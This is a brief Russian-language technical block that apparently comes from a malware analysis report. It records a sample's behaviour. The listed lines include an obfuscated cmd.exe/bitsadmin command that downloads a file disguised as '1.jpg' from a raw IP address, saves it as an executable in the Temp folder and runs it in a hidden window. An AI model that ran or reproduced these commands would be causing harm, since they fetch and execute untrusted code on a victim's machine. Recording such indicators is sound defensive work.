Техническая информация
- '<SYSTEM32>\cmd.exe' /c b^i^tsad^min /transfer /download "http://80.82.67.217/1.jpg" "%LOCALAPPDATA%\Temp/SAxa2.exe" && "%LOCALAPPDATA%\Temp/SAxa2.exe"
- '80.##.67.217':80
- '<SYSTEM32>\cmd.exe' /c b^i^tsad^min /transfer /download "http://80.82.67.217/1.jpg" "%LOCALAPPDATA%\Temp/SAxa2.exe" && "%LOCALAPPDATA%\Temp/SAxa2.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://80.82.67.217/1.jpg" "%LOCALAPPDATA%\Temp/SAxa2.exe"